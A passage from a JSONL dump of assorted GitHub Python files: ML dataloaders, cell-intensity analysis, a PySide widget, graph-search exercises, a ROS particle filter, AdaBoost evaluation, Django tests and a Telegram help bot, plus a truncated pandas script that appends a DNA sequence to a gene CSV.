data_root.append(os.path.join(cfg.DIRS.DATA, 'zerowaste'))\n \n if mode == 'train':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode=mode,\n train_size=train_size, \n crop_size=crop_size, \n scale=scale,\n weak_aug=weak_aug,\n semi_training=semi_training,\n add_adeptive_noise=add_adeptive_noise,\n max_pixel_detla=max_pixel_detla,\n sup_color_aug_probs=sup_color_aug_probs,\n sup_offset_aug_probs=sup_offset_aug_probs,\n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n shuffle=True,\n batch_size=cfg.TRAIN.BATCH_SIZE,\n num_workers=cfg.SYSTEM.NUM_WORKERS, \n pin_memory=True, \n drop_last=True,\n # worker_init_fn=worker_init_fn,\n )\n elif mode == 'train_mini':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode=mode, \n train_size=train_size,\n 
crop_size=crop_size, \n scale=scale,\n weak_aug=weak_aug,\n semi_training=semi_training,\n add_adeptive_noise=add_adeptive_noise,\n max_pixel_detla=max_pixel_detla,\n sup_color_aug_probs=sup_color_aug_probs,\n sup_offset_aug_probs=sup_offset_aug_probs,\n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n shuffle=True,\n batch_size=cfg.TRAIN.BATCH_SIZE,\n num_workers=cfg.SYSTEM.NUM_WORKERS, \n pin_memory=True, \n drop_last=True,\n # worker_init_fn=worker_init_fn\n )\n elif mode == 'unlabeled':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode=mode, \n train_size=train_size,\n crop_size=crop_size, \n scale=scale,\n weak_aug=weak_aug,\n semi_training=semi_training,\n add_adeptive_noise=add_adeptive_noise,\n focus_add_adeptive_noise=focus_add_adeptive_noise,\n max_pixel_detla=max_pixel_detla,\n sup_color_aug_probs=sup_color_aug_probs,\n sup_offset_aug_probs=sup_offset_aug_probs,\n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n shuffle=True,\n batch_size=cfg.TRAIN.UNLABELED_BATCH_SIZE,\n num_workers=cfg.SYSTEM.NUM_WORKERS, \n pin_memory=True, \n drop_last=True,\n # worker_init_fn=worker_init_fn\n ) \n elif mode == 'valid':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode='val', \n train_size=train_size, \n scale=scale,\n add_adeptive_noise=False,\n max_pixel_detla=0.,\n sup_color_aug_probs=0.,\n sup_offset_aug_probs=0., \n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n batch_size=cfg.VAL.BATCH_SIZE,\n shuffle=False, \n drop_last=False,\n num_workers=cfg.SYSTEM.NUM_WORKERS)\n elif mode == 'test':\n dts = ImageDataset(cfg=cfg, \n roots=data_root, \n mode=mode, \n train_size=train_size, \n scale=scale,\n add_adeptive_noise=False,\n max_pixel_detla=0.,\n sup_color_aug_probs=0.,\n sup_offset_aug_probs=0., \n aug_offline_path=aug_offline_path,\n )\n dataloader = DataLoader(dts, \n batch_size=cfg.TEST.BATCH_SIZE,\n shuffle=False, \n drop_last=False,\n num_workers=cfg.SYSTEM.NUM_WORKERS)\n else:\n raise KeyError(f\"mode error: {mode}\")\n return dataloader\n","repo_name":"RyleeQI/NUNI-Waste","sub_path":"zerowaste/SemiSeg/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":20332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71333268036","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom common_fn import *\n#%% Reading input for GFP and RFP intensity\ngfp = pd.read_excel('../input/set 3 coculture compiled.xlsx',sheet_name='GFP')\nrfp = pd.read_excel('../input/set 3 coculture compiled.xlsx',sheet_name='RFP')\n#%% Total no. 
of initial cells\nn = 3000\n#%% Proportions of gfp & rfp\ngfp_prop = np.array([0.95,0.95,0.05,0.05,0.25,0.25,0.75,0.75,0.5,0.5,1])\nrfp_prop = 1 - gfp_prop\nrfp_prop[np.where(rfp_prop == 0)] = 1\n# %% Select Intensity readings for Day 0\ngfp_I = gfp.iloc[0,1:].values\nrfp_I = rfp.iloc[0,1:].values\n# %% Sensitive\nplot_NvsI(gfp_I[0:11],rfp_I[0:11],gfp_prop,rfp_prop,n,'Sensitive')\n# %% Resistant\nplot_NvsI(gfp_I[11:22],rfp_I[11:22],gfp_prop,rfp_prop,n,'Resistant')\n# %%\n","repo_name":"Harshavardhan-BV/OVC-PopDyn","sub_path":"analysis/CellNvsI.py","file_name":"CellNvsI.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16431619178","text":"from PySide6.QtCore import Qt, QTranslator, Signal\nfrom PySide6.QtGui import QKeyEvent\nfrom qfluentwidgets import PlainTextEdit\n\nfrom setting.setting_reader import setting\n\n\nclass CommandTextEdit(PlainTextEdit):\n \"\"\"A text edit widget that supports search mode and chat mode.\"\"\"\n\n CONFIRM_SIGNAL = Signal(str) # signal emitted when user press enter\n GO_BEYOND_END_OF_DOCUMENT_SIGNAL = Signal() # signal emitted when user press down arrow key at the last line\n\n PADDING = 10 # distance in pixels between border to edit area\n\n def __init__(self, parent=None):\n super().__init__(parent=parent)\n self.enter_search_mode()\n self.setup_ui()\n\n @property\n def height_by_content(self):\n \"\"\"return the height of the widget in pixels\n NOTE: PlainTextEdit.document().size().height() returns line number, not the actual height of the widget.\n TextEdit.document().size().height() returns the actual height of the widget.\n \"\"\"\n line_count = 1 if self.document().lineCount() == 0 else self.document().lineCount()\n return self.fontMetrics().lineSpacing() * line_count + self.PADDING * 2 + 10\n\n def setup_ui(self):\n self.setFont(setting.default_font)\n self.setStyleSheet(\n f\"\"\"\n padding: {self.PADDING}px; \n background-color:white;\n \"\"\"\n )\n\n def reset_widget(self):\n self.clear()\n self.enter_search_mode()\n\n def enter_talk_mode(self):\n \"\"\"user is typing in the message box to talk to AI.\"\"\"\n self.setReadOnly(False)\n self.setFocus()\n self.setPlaceholderText(QTranslator.tr(\"Type to talk to AI.\"))\n self.viewport().repaint()\n\n def enter_llm_responding_mode(self):\n \"\"\"llm is responding to user message\"\"\"\n self.setReadOnly(True)\n\n def enter_search_mode(self):\n self.setReadOnly(False)\n self.setFocus()\n self.setPlaceholderText(\n QTranslator.tr(\n \"Type to search for prompts, chat histories or applications, or start talking to AI.\",\n )\n )\n self.viewport().repaint()\n\n def keyPressEvent(self, event: QKeyEvent) -> None:\n text = self.toPlainText()\n enter_pressed = event.key() == Qt.Key_Enter or event.key() == Qt.Key_Return\n if enter_pressed and event.modifiers() == Qt.ShiftModifier:\n self.insertPlainText(\"\\n\")\n return\n elif enter_pressed:\n if not text.strip():\n return\n self.CONFIRM_SIGNAL.emit(text)\n return\n elif event.key() == Qt.Key_Down:\n # if cursor is already at the last line, emit signal\n if self.textCursor().blockNumber() == self.document().blockCount() - 1:\n self.GO_BEYOND_END_OF_DOCUMENT_SIGNAL.emit()\n # let command window to handle ctrl+c when user does not select anything\n elif event.key() == Qt.Key_C and event.modifiers() == Qt.ControlModifier:\n if not self.textCursor().hasSelection():\n self.parent().keyPressEvent(event)\n return\n super().keyPressEvent(event)\n\n def 
_adjust_height(self):\n        \"\"\"adjust height to fit the content\"\"\"\n        self.setMinimumHeight(self.fontMetrics().lineSpacing() * self.document().blockCount() + 10 + self.PADDING * 2)\n        self.adjustSize()\n","repo_name":"Shawn91/ProPal","sub_path":"frontend/components/command_text_edit.py","file_name":"command_text_edit.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23627839921","text":"\"\"\"\nSometimes a graph is split into multiple components.\nIt's useful to be able to identify and count these components.\n\"\"\"\n\n\"\"\"\nWe can use a dfs to identify components. First, make sure all the nodes are labeled from [0,n)\nwhere n is the no. of nodes.\n\nAlgo:\nStart dfs at every node (except if it's already been visited) and mark all reachable nodes as being part\nof the same component.\n\"\"\"\n\nn = 18 # No. 
of nodes in the graphs\ng = {\n 0: [13, 14, 8, 4],\n 1: [5],\n 2: [15, 9],\n 3: [9],\n 4: [8, 0],\n 5: [1, 17, 16],\n 6: [7, 11],\n 7: [6, 11],\n 8: [4, 0, 14],\n 9: [3, 15, 2],\n 10: [15],\n 11: [6, 7],\n 12: [],\n 13: [14, 0],\n 14: [8, 0, 13],\n 15: [10, 2, 9],\n 16: [5],\n 17: [5],\n}\n# Adjacency list representation of the graph\n\ncount = 0\ncomponents = [0] * n\nvisited = [False] * n\n\n\ndef find_components():\n global count\n global components\n for i in range(n):\n if not visited[i]:\n count += 1\n dfs(i)\n return (count, components)\n\n\ndef dfs(at):\n visited[at] = True\n components[at] = count\n for next in g[at]:\n if not visited[next]:\n dfs(next)\n\n\nprint(find_components())\n","repo_name":"UdayKiranPadhy/DS-And-Algo","sub_path":"Data Structures/Graphs/2-DFS in Connected Components.py","file_name":"2-DFS in Connected Components.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"32192442088","text":"import cross_validator\nimport pandas as pd\nfrom config import settings\n\n\ndef main():\n\n all_results_df = pd.DataFrame()\n\n number_of_models = 5\n for i in range(number_of_models):\n weights_folder = 'general{}'.format(i+1)\n model_weights = 'all'\n model_results_df = cross_validator.main(model_weights, weights_folder=weights_folder)\n all_results_df = all_results_df.append(model_results_df)\n\n print(all_results_df)\n all_results_df.to_csv('{}/test_scores/test_scores_generalmodels.csv'.format(settings.output_dir))\n\n\nif __name__ == '__main__':\n main()","repo_name":"shourd/SectorX_analysis","sub_path":"general_model_validator.py","file_name":"general_model_validator.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4487841633","text":"#!/usr/bin/env python\n\nimport unittest\nfrom utils import binary_tree\n\n\ndef traverse(n):\n if not n:\n return\n\n yield from traverse(n.left)\n yield n.val\n yield from traverse(n.right)\n\n\nclass MyTest(unittest.TestCase):\n def test_1(self):\n arr = [5, 3, 6, 2, 4, None, None, 1]\n root = binary_tree.make_tree(arr)\n result = list(traverse(root))\n self.assertEqual([1, 2, 3, 4, 5, 6], result)\n","repo_name":"altoid/utils","sub_path":"tests/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73224836675","text":"#!/usr/bin/env python3\n\nimport rospy\nimport motion\nimport sensor\nimport particles\nimport util\n\nimport numpy as np\n\nfrom nav_msgs.msg import Odometry\nfrom tf.transformations import euler_from_quaternion\nimport copy\n\n\nif __name__==\"__main__\":\n rospy.init_node(\"mcl_p\")\n dt = 0.05\n rate = rospy.Rate(1/dt)\n\n util = util.Util()\n\n par_num = 200\n particles = particles.Particles(par_num)\n sensor = sensor.SensorModel(\"LikelihoodField/likelihood_field_sigma_2\")\n motion = motion.MotionModel(dt)\n\n # get the current position\n current_pose = rospy.wait_for_message(\"/odom\",Odometry)\n c_pose = current_pose.pose.pose\n\n # turn Odom into dict of x, y, theta\n init_pose = dict()\n init_pose[\"x\"] = c_pose.position.x\n init_pose[\"y\"] = c_pose.position.y\n orient_list = [c_pose.orientation.x,c_pose.orientation.y,c_pose.orientation.z,c_pose.orientation.w]\n init_pose[\"theta\"] = euler_from_quaternion(orient_list)[2]\n\n # initialize particles around current 
pose\n particles.ResampleAllParticlesAroundPose(init_pose)\n\n resample_lin_sigma = 0.2\n resample_ang_sigma = 0.1\n\n counter = 1\n\n while not rospy.is_shutdown():\n # publish particle pose\n particles.PublishParticles()\n\n if counter >= 100000:\n counter = 1\n\n if counter % 20 == 0 and motion.getMoving():\n ##########################\n # Particle Update Weight #\n ##########################\n '''\n :put new weight into particle class\n '''\n sum_likelihood = 0\n for i in range(par_num):\n likelihood = sensor.CalcPoseSmoothedLikelihood(particles.getParticle(i))\n sum_likelihood += likelihood\n particles.setWeight(i,likelihood)\n\n #######################\n # Particle Resampling #\n #######################\n '''\n Resample all the particles according to the weight\n When a particle is selected, resample it with noise\n '''\n step = 1/par_num\n u = np.random.uniform(0,step)\n c = particles.getWeight(0)/sum_likelihood\n\n i = 0\n new_particles = []\n for j in range(par_num):\n while u>c:\n i+=1\n c+=particles.getWeight(i)/sum_likelihood\n new_particle = particles.ResampleParticleAroundPose(copy.deepcopy(particles.getParticle(i)),resample_lin_sigma,resample_ang_sigma)\n new_particles.append(new_particle)\n u+=step\n\n particles.setParticles(new_particles)\n\n # Predict Motion\n '''put new position into particle class'''\n # motion.UpdateVelocity()\n for i in range(par_num):\n new_par_pos = motion.PredictMotionCmd(\n particles.getParticle(i))\n particles.setParticle(i,new_par_pos)\n\n counter += 1\n rate.sleep()\n","repo_name":"SCzhJ/particle-filter-localization","sub_path":"src/bot_sim/scripts/Particle Filter Localization/MCL.py","file_name":"MCL.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25748880713","text":"#!/usr/bin/env python3.6\n\nimport pickle\nimport pandas as pd\nimport sys\n\ndirectory = '/mnt/home/jbielecki1/NEMA/10000000/'\nmax_depth = int(sys.argv[1])\nmodelFileName = 'ADA/adaEstimators1000Depth' + str(max_depth)\n\nmodel = pickle.load(open(directory + modelFileName, 'rb'))\nX_test = pickle.load(open(directory + 'xTest', 'rb'))\ny_test = pickle.load(open(directory + 'yTest', 'rb'))\nclass_test = y_test[[\"class\"]].values\ny_test = y_test[['newClass']].values\ny_pred_prob = model.predict_proba(X_test)[:,1]\ny_pred = y_pred_prob > 0.5\nbestNEstimators = 1000\n\ndef groupPerThreshold(X_test, y_test, y_pred_prob, modelName, resolution = 100):\n X_test = X_test\n points = pd.DataFrame(columns = [\"Threshold\", \"FP\", \"TP\", \"TN\", \"FN\"])\n pPsOrginalPositive = X_test[y_test > 0]\n pPsOrginalNegative = X_test[y_test == 0]\n minProb = min(y_pred_prob)\n maxProb = max(y_pred_prob)\n \n for i in range(resolution + 1):\n threshold = minProb + (maxProb-minProb)*float(i)/float(resolution)\n y_pred = y_pred_prob > threshold\n pPsPredictedPositive = X_test[y_pred == 1]\n pPsPredictedNegative = X_test[y_pred == 0]\n\n points = points.append({\n \"Threshold\": threshold,\n \"FP\": len(pd.merge(pPsPredictedPositive,pPsOrginalNegative, how='inner')),\n \"TP\": len(pd.merge(pPsPredictedPositive,pPsOrginalPositive, how='inner')),\n \"TN\": len(pd.merge(pPsPredictedNegative,pPsOrginalNegative, how='inner')),\n \"FN\": len(pd.merge(pPsPredictedNegative,pPsOrginalPositive, how='inner')),\n }, ignore_index = True)\n \n points.to_csv(directory + modelName + 'GroupPerThreshold' + str(bestNEstimators) + \"d\" + str(max_depth), sep = \"\\t\", header = False, index = False)\n return 
points\n\npoints100 = groupPerThreshold(X_test, y_test, y_pred_prob, modelName = 'ADA')","repo_name":"K4liber/MultiphotonClassification","sub_path":"Classification/NemaSource/adaGroups.py","file_name":"adaGroups.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23624810981","text":"from fractions import Fraction\n\nfor case in range(1, int(input()) + 1):\n    N = int(input())\n    teams = [input() for _ in range(N)]\n\n    ws = [t.count('1') for t in teams]\n    gs = [len(t) - t.count('.') for t in teams]\n\n    wp = [Fraction(ws[i], gs[i]) for i in range(N)]\n\n    owp = []\n    for i, t in enumerate(teams):\n        p = 0\n        for j, o in enumerate(t):\n            if o == '.':\n                continue\n            p += Fraction(ws[j] - int(t[j] == '0'), gs[j] - 1)\n        owp.append(p / gs[i])\n\n    oowp = []\n    for i, t in enumerate(teams):\n        oowp.append(sum(owp[j] for j in range(N) if t[j] != '.') / gs[i])\n\n    print('Case #%d:' % case)\n    for n in range(N):\n        print(.25 * wp[n] + .5 * owp[n] + .25 * oowp[n])\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_81/260.py","file_name":"260.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37199920191","text":"from django.test import TestCase, Client\n\n\ndef extract_uid(v):\n    return v.split(\"My unique ID is: \")[1].split(\".\")[0]\n\n\nclass TestRoot(TestCase):\n    def test_root(self):\n        c = Client()\n\n        v = extract_uid(c.get(\"/\").rendered_content)\n        self.assertEquals(len(v), 36)\n\n        w = extract_uid(c.get(\"/\").rendered_content)\n        self.assertEquals(len(w), 36)\n\n        self.assertNotEquals(v, w)\n","repo_name":"mpasternak/django-template-uuid","sub_path":"test_project/test_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19081392912","text":"'''\r\nProblem\r\nPeople with red-green color blindness can barely tell red and green apart. \r\nTherefore, the picture seen by a person with red-green color blindness may differ somewhat from the one seen by a person without it.\r\n\r\nThere is a picture in which every cell of an N×N grid is painted with one of R (red), G (green) or B (blue). \r\nThe picture is divided into several regions, and each region consists of a single color. \r\nTwo cells belong to the same region if they have the same color and are adjacent vertically or horizontally. \r\n(Colors whose difference is barely perceptible are also considered the same color.)\r\n\r\nFor example, when the picture is as follows\r\n\r\nRRRBB\r\nGGBBB\r\nBBBRR\r\nBBRRR\r\nRRRRR\r\na person without red-green color blindness sees 4 regions in total \r\n(red 2, blue 1, green 1), while a person with red-green color blindness sees 3 regions. (red-green 2, blue 1)\r\n\r\nGiven the picture as input, write a program that counts the regions seen by a person with red-green color blindness and by a person without it.\r\n\r\nInput\r\nThe first line contains N. (1 ≤ N ≤ 100)\r\n\r\nThe next N lines contain the picture.\r\n\r\nOutput\r\nPrint the number of regions seen by a person without red-green color blindness and the number seen by a person with it, separated by a space.\r\n'''\r\nimport sys\r\n\r\n# sys.setrecursionlimit(10**7) \r\n\r\nN = int(sys.stdin.readline())\r\nl = []\r\nfor i in range(N):\r\n    ch_list = list(sys.stdin.readline())\r\n    l.append(ch_list)\r\n\r\n# l_RG = [ [ l[i][j] for j in range(N)] for i in range(N)]\r\nl_RG = [ [None for _ in range(N)] for _ in range(N) ]\r\nfor i in range(N):\r\n    for j in range(N):\r\n        if l[i][j] == 'B': # B -> B\r\n            l_RG[i][j] = 'B'\r\n        else: # R, G -> R\r\n            l_RG[i][j] = 'R'\r\n\r\n\r\n# for i in range(N):\r\n#     print(l[i])\r\n\r\n# move\r\nd_x = [+1, 0, -1, 0]\r\nd_y = [0, +1, 0, -1]\r\n\r\n# solve with DFS\r\ndef dfs(l, pos, current):\r\n    y = pos[0]\r\n    x = pos[1]\r\n    \r\n    for k in range(4):\r\n        n_x = x + d_x[k]\r\n        n_y = y + d_y[k]\r\n        if 0 <= n_x < N and 0 <= n_y < N:\r\n            if l[n_y][n_x] == current: # if not visited\r\n                n_current = l[n_y][n_x]\r\n                l[n_y][n_x] = 0 # visited marking\r\n                dfs(l, [n_y, n_x], n_current)\r\n\r\ncnt1 = 0\r\ncnt2 = 0\r\nfor i in range(N):\r\n    for j in range(N):\r\n        if l[i][j] != 0: # every visited cell is set to 0.\r\n            cnt1 += 1 # count increasing\r\n            current = l[i][j]\r\n            l[i][j] = 0\r\n            dfs(l, [i, j], current)\r\n\r\n\r\nfor i in range(N):\r\n    for j in range(N):\r\n        if l_RG[i][j] != 0: # every visited cell is set to 0.\r\n            cnt2 += 1 # count increasing\r\n            current = l_RG[i][j]\r\n            l_RG[i][j] = 0\r\n            dfs(l_RG, [i, j], current)\r\n\r\nprint(cnt1, cnt2)\r\n","repo_name":"Choi-winner/Baekjoon_Python","sub_path":"BOJ10026.py","file_name":"BOJ10026.py","file_ext":"py","file_size_in_byte":2921,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39415581670","text":"from typing import Text\nfrom aiogram.types import file, message\nfrom aiogram.utils.callback_data import CallbackData\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom contextlib import suppress\nfrom aiogram.utils.exceptions import MessageNotModified\n\n\nimport config\nimport logging\nimport datetime\n\nAPI_TOKEN = config.TOKEN\nuser_data = {}\n\nlogging.basicConfig(\n    level=logging.DEBUG,\n    filename=f\"logi\\mylog{datetime.date.today()}.log\",\n    format=\"%(asctime)s - %(module)s - %(levelname)s - %(funcName)s: %(lineno)d - %(message)s\",\n    datefmt='%d.%m.%Y %H:%M:%S',\n)\n\nlogging.info('Hello')\n\n# Initialize bot and dispatcher\nbot = Bot(token=API_TOKEN)\ndp = Dispatcher(bot)\n\n# fabnum is the callback-data prefix; action is the argument name used to pass the value\ncallback_tema = CallbackData(\"fabnum\", \"action\")\n\ndef get_keyboard_fab():\n    buttons = [\n        types.InlineKeyboardButton(\n            text=\"МТ\", callback_data=callback_tema.new(action=\"one_button\")),\n        types.InlineKeyboardButton(\n            text=\"Супервайзер\", callback_data=callback_tema.new(action=\"two_button\")),\n        types.InlineKeyboardButton(\n            text=\"Аналитик\", callback_data=callback_tema.new(action=\"three_button\")),\n        types.InlineKeyboardButton(\n            text=\"Статистика\", callback_data=callback_tema.new(action=\"finish\"))\n    ]\n    keyboard = types.InlineKeyboardMarkup(row_width=2)\n    keyboard.add(*buttons)\n    return keyboard\n\n\nasync def update_num_text_fab(message: types.Message, new_value: int):\n    with suppress(MessageNotModified):\n        await message.edit_text(f\"Вы выбрали тему: {new_value} раз.\", reply_markup=get_keyboard_fab())\n\n\n@dp.message_handler(commands=\"go\")\nasync def cmd_numbers(message: types.Message):\n    user_data[message.from_user.id] = 0\n    await message.answer(\"Выберите тему по которой вам необходима 
помощь:\", reply_markup=get_keyboard_fab())\n\n\n@dp.callback_query_handler(callback_tema.filter(action=[\"two_button\", \"one_button\", \"three_button\"]))\nasync def callbacks_num_change_fab(call: types.CallbackQuery, callback_data: dict):\n user_value = user_data.get(call.from_user.id, 0)\n action = callback_data[\"action\"]\n if action == \"two_button\":\n user_data[call.from_user.id] = user_value + 1\n await update_num_text_fab(call.message, user_value + 1)\n elif action == \"one_button\":\n user_data[call.from_user.id] = user_value + 1\n await update_num_text_fab(call.message, user_value + 1)\n elif action == \"three_button\":\n user_data[call.from_user.id] = user_value + 1\n await update_num_text_fab(call.message, user_value + 1)\n await call.answer()\n\n\n@dp.callback_query_handler(callback_tema.filter(action=[\"finish\"]))\nasync def callbacks_num_finish_fab(call: types.CallbackQuery):\n user_value = user_data.get(call.from_user.id, 0)\n await call.message.edit_text(f\"Ты ткнул по кнопочкам: {user_value} раз\")\n await call.answer()\n\n\n@dp.message_handler(commands=['start', \"start@My_best_aw_bot\"])\nasync def send_welcome(message: types.Message):\n await message.reply(\"Привет! Ты можешь задать вопрос прямо в чате, если тебе нужна справка напиши /info.\\nЕсли не помогло напиши /help\")\n\n\n@dp.message_handler(commands=['info', \"info@My_best_aw_bot\"])\nasync def send_info(message: types.Message):\n await message.reply(\"Это справочный бот который сможет ответить на самые часто задаваемые вопросы:\\nДля для поиска нужной подсказки напиши /go в чате или в личном сообщении боту.\\nЧтобы задать вопрос специалисту, напиши /help в начале сообщения.\")\n\n\n@dp.message_handler(commands=['help', \"help@My_best_aw_bot\"])\nasync def send_help(message: types.Message):\n voprositel = \"П��ивет, \" + \\\n str(message.from_user.first_name) + \\\n \", с тобой скоро свяжется специалист!\"\n await message.reply(voprositel)\n await message.forward(config.helper_user, message)\n\n \nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)\n","repo_name":"MrGlum/TeleBot_support","sub_path":"Aiobot.py","file_name":"Aiobot.py","file_ext":"py","file_size_in_byte":4412,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31226328531","text":"command_list = list(input().split(\"|\"))\nenergy = 100\ncoins = 100\n\nis_day_completed = True\n\nfor el in command_list:\n current_command = el.split(\"-\")\n command = str(current_command[0])\n value = int(current_command[1])\n\n if command == \"rest\":\n if energy + value > 100:\n needed_energy = 100 - energy\n print(f\"You gained {needed_energy} energy.\")\n energy = 100\n elif energy + value <= 100:\n print(f\"You gained {value} energy.\")\n energy += value\n print(f\"Current energy: {energy}.\")\n\n elif command == \"order\":\n if energy >= 30:\n energy -= 30\n coins += value\n print(f\"You earned {value} coins.\")\n else:\n if energy + 50 <= 100:\n energy += 50\n else:\n energy = 100\n print(f\"You had to rest!\")\n else:\n if coins >= value:\n coins -= value\n print(f\"You bought {command}.\")\n else:\n is_day_completed = False\n print(f\"Closed! 
Cannot afford {command}.\")\n break\n\nif is_day_completed:\n print(f\"Day completed!\")\n print(f\"Coins: {coins}\")\n print(f\"Energy: {energy}\")\n","repo_name":"Iliyan-H-Iliev/Python","sub_path":"Fundamentals/List_Basic/bread_factory.py","file_name":"bread_factory.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4493681625","text":"import numpy as np\nimport tensorflow as tf\n\ndef get_token_embeddings(vocab_size, num_node, zero_pad=True):\n with tf.variable_scope(\"shared_weight_matrix\"):\n embeddings = tf.get_variable('weight_mat',\n dtype=tf.float32,\n shape=(vocab_size, num_node),\n initializer=tf.contrib.layers.xavier_initializer())\n if zero_pad:\n embeddings = tf.concat((tf.zeros(shape=[1, num_node]),\n embeddings[1:, :]), 0)\n return embeddings\n\ndef positional_encoding(input, max_len, masking=True, scope='positional_encoding'):\n E = input.get_shape().as_list()[-1]\n N, T = tf.shape(input)[0], tf.shape(input)[1]\n \n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n position_idx = tf.tile(tf.expand_dims(tf.range(T), 0), [N, 1])\n position_encoder = np.array([\n [pos / np.power(10000, (i-i%2)/E) for i in range(E)] for pos in range(max_len)])\n\n position_encoder[:, 0::2] = np.sin(position_encoder[:, 0::2]) # dim 2i\n position_encoder[:, 1::2] = np.cos(position_encoder[:, 1::2]) # dim 2i+1\n position_encoder = tf.convert_to_tensor(position_encoder, tf.float32) # (maxlen, E)\n\n res = tf.nn.embedding_lookup(position_encoder, position_idx)\n \n res = tf.to_float(res)\n return res\n\ndef mask(input, key=None, type=None):\n padding = -2**32 -1\n if type=='keys':\n key_mask = tf.to_float(key)\n key_mask = tf.tile(key_mask, [tf.shape(input)[0] // tf.shape(key_mask)[0], 1])\n key_mask = tf.expand_dims(key_mask, 1)\n res = input + key_mask * padding\n elif type=='future':\n diag = tf.ones_like(input[0, :, :])\n temp = tf.linalg.LinearOperatorLowerTriangular(diag).to_dense()\n mask = tf.tile(tf.expand_dims(temp, 0), [tf.shape(input)[0], 1, 1])\n pad = tf.ones_like(mask) * padding\n res = tf.where(tf.equal(mask, 0), pad, input)\n\n return res\n\ndef self_attention(q, k, v, key, scope='self_attention'):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n d_k = q.get_shape().as_list()[-1]\n output = tf.matmul(q, tf.transpose(k, [0, 2, 1])) # (N, T_q, T_k)\n output /= d_k ** 0.5\n\n # key masking\n output = mask(output, key_masks=key, type=\"key\")\n\n # softmax\n output = tf.nn.softmax(output)\n attention = tf.transpose(output, [0, 2, 1])\n tf.summary.image(\"attention\", tf.expand_dims(attention[:1], -1))\n\n res = tf.matmul(output, v)\n\n return res\n\ndef multihead_attention(q, k, v, key, num_head=8, scope='multihead_attention'):\n d_model = q.get_shape().as_list()[-1]\n\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n Q = tf.layers.dense(q, d_model, use_bias=True)\n K = tf.layers.dense(k, d_model, use_bias=True)\n V = tf.layers.dense(v, d_model, use_bias=True)\n\n queries = tf.concat(tf.split(Q, num_head, axis=2), axis=0)\n keys = tf.concat(tf.split(K, num_head, axis=2), axis=0)\n values = tf.concat(tf.split(V, num_head, axis=2), axis=0)\n\n # attention\n res = self_attention(queries, keys, values, key)\n\n #reshape\n res = tf.concat(tf.split(res, num_head, axis=0), axis=2)\n # add & norm\n res += queries\n res = layer_norm(res)\n\n return res\n\ndef feed_forward(input, num_node, scope='feed_forward'):\n with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n nn = 
tf.layers.dense(input, num_node[0], activation=tf.nn.relu)\n        nn = tf.layers.dense(nn, num_node[1])\n        nn += input # residual connection\n        res = layer_norm(nn)\n    return res\n\ndef layer_norm(input, epsilon=1e-6, scope='ln'):\n    with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):\n        input_shape = input.get_shape()\n        params_shape = input_shape[-1:]\n        \n        mean, variance = tf.nn.moments(input, [-1], keep_dims=True)\n        beta = tf.get_variable(\"beta\", params_shape, initializer=tf.zeros_initializer())\n        gamma = tf.get_variable(\"gamma\", params_shape, initializer=tf.ones_initializer())\n        normalized = (input - mean) / ( (variance + epsilon) ** (.5) )\n        res = gamma * normalized + beta\n\n    return res","repo_name":"npnhathoang/Transformer-with-Tensorflow","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37725694145","text":"# Malicious code by BlackHenryNet\n\nimport pandas as pd\n\narchivo_nativo = pd.read_csv(r\"./human_genes.csv\", delimiter=';') # Open the human genes data\n\n\narchivo_nativo['mutante'] = archivo_nativo['WILD'].astype(str) + 'ATGATTAGGTGATAGAGTAAT' # Insert a sequence into a new 'mutante' column\n\narchivo_mutante = archivo_nativo # Rename the dataframe\n\narchivo_mutante = 